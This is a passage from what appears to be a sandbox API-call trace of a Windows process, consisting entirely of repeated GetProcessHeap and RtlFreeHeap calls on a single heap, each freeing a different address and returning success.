RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8b90) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9337200) returned 1 [0294.147] GetProcessHeap () returned 0x21ed8c70000 [0294.147] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93371c0) returned 1 [0294.147] GetProcessHeap () returned 0x21ed8c70000 [0294.147] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9336f20) returned 1 [0294.147] GetProcessHeap () returned 0x21ed8c70000 [0294.147] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8650) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9336dc0) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9336d80) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9304dd0) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9326d90) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9302bb0) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8320) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56420) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d567e0) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56ba0) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66eb0) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.148] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c830) returned 1 [0294.148] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b0f0) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bf30) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93268f0) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93268b0) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b4b0) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc82c0) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9304410) returned 1 [0294.149] GetProcessHeap () returned 0x21ed8c70000 [0294.149] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93168c0) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9302940) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc79c0) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c758a0) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d656b0) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6afd0) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8910) returned 1 [0294.151] GetProcessHeap () returned 0x21ed8c70000 [0294.152] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bfd0) returned 1 [0294.152] GetProcessHeap () returned 0x21ed8c70000 [0294.152] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93166c0) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9316680) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93163e0) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be90) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93161e0) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93161a0) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9302460) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.153] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93061b0) returned 1 [0294.153] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9303300) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8260) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d58220) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d575a0) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57e60) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67130) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b1b0) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b570) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937be70) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9301d00) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9301cc0) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937ce30) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8200) returned 1 [0294.154] GetProcessHeap () returned 0x21ed8c70000 [0294.154] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5cff0) returned 1 [0294.155] GetProcessHeap () returned 0x21ed8c70000 [0294.155] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f1cd0) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5d4d0) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7de0) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d678b0) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67db0) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d676b0) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8a50) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8b50) returned 1 [0294.157] GetProcessHeap () returned 0x21ed8c70000 [0294.157] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f1b30) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f1af0) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f1850) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8610) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f16b0) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f1670) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5bc70) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92e1680) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5cd80) returned 1 [0294.158] GetProcessHeap () returned 0x21ed8c70000 [0294.158] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7960) returned 1 [0294.159] GetProcessHeap () returned 0x21ed8c70000 [0294.159] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57be0) returned 1 [0294.159] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57460) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d576e0) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67d30) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c6b0) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bab0) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cbf0) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92e11e0) returned 1 [0294.160] GetProcessHeap () returned 0x21ed8c70000 [0294.160] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92e11a0) returned 1 [0294.161] GetProcessHeap () returned 0x21ed8c70000 [0294.161] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c5f0) returned 1 [0294.161] GetProcessHeap () returned 0x21ed8c70000 [0294.161] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7840) returned 1 [0294.161] GetProcessHeap () returned 0x21ed8c70000 [0294.161] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5d740) returned 1 [0294.161] GetProcessHeap () returned 0x21ed8c70000 [0294.161] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d11b0) returned 1 [0294.162] GetProcessHeap () returned 0x21ed8c70000 [0294.162] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5ba00) returned 1 [0294.162] GetProcessHeap () returned 0x21ed8c70000 [0294.162] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7f60) returned 1 [0294.162] GetProcessHeap () returned 0x21ed8c70000 [0294.162] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7cc0) returned 1 [0294.162] GetProcessHeap () returned 0x21ed8c70000 [0294.162] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7e40) returned 1 [0294.162] GetProcessHeap () returned 0x21ed8c70000 [0294.162] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc75a0) returned 1 [0294.162] GetProcessHeap () returned 0x21ed8c70000 [0294.163] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e60) returned 1 [0294.163] GetProcessHeap () returned 0x21ed8c70000 [0294.163] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0294.163] GetProcessHeap () returned 0x21ed8c70000 [0294.163] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d1090) returned 1 [0294.163] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d1050) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d0db0) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45dd0) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d0c90) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d0c50) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5c630) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92c0c60) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5b790) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7900) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d566a0) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57aa0) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.164] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d580e0) returned 1 [0294.164] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67630) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b270) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bdb0) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cd70) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92c07c0) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92c0780) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c530) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8440) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5c150) returned 1 [0294.165] GetProcessHeap () returned 0x21ed8c70000 [0294.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b0790) returned 1 [0294.166] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5b520) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7f00) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6af30) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65d90) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ae90) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bd50) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c110) returned 1 [0294.167] GetProcessHeap () returned 0x21ed8c70000 [0294.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b0580) returned 1 [0294.168] GetProcessHeap () returned 0x21ed8c70000 [0294.168] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b0540) returned 1 [0294.168] GetProcessHeap () returned 0x21ed8c70000 [0294.168] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b02a0) returned 1 [0294.168] GetProcessHeap () returned 0x21ed8c70000 [0294.168] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c070) returned 1 [0294.168] GetProcessHeap () returned 0x21ed8c70000 [0294.168] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b0090) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b0050) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5a680) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a0060) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5e100) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7d80) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57960) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57320) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d57d20) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67cb0) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c170) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.169] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c3b0) returned 1 [0294.169] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b870) returned 1 [0294.170] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c2a0) returned 1 [0294.170] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c260) returned 1 [0294.170] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c470) returned 1 [0294.170] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7ba0) returned 1 [0294.170] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5bee0) returned 1 [0294.170] GetProcessHeap () returned 0x21ed8c70000 [0294.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9290070) returned 1 [0294.172] GetProcessHeap () returned 0x21ed8c70000 [0294.172] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5dc20) returned 1 [0294.172] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc77e0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63e70) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63cb0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d643b0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc87d0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c100) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2c0c0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2be20) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc89d0) returned 1 [0294.173] GetProcessHeap () returned 0x21ed8c70000 [0294.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2bcc0) returned 1 [0294.174] GetProcessHeap () returned 0x21ed8c70000 [0294.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2bc80) returned 1 [0294.174] GetProcessHeap () returned 0x21ed8c70000 [0294.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5c3c0) returned 1 [0294.174] GetProcessHeap () returned 0x21ed8c70000 [0294.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9280080) returned 1 [0294.175] GetProcessHeap () returned 0x21ed8c70000 [0294.175] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5b2b0) returned 1 [0294.175] GetProcessHeap () returned 0x21ed8c70000 [0294.175] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc78a0) returned 1 [0294.175] GetProcessHeap () returned 0x21ed8c70000 [0294.175] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d570a0) returned 1 [0294.176] GetProcessHeap () returned 0x21ed8c70000 [0294.176] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d571e0) returned 1 [0294.176] GetProcessHeap () returned 0x21ed8c70000 [0294.176] RtlFreeHeap 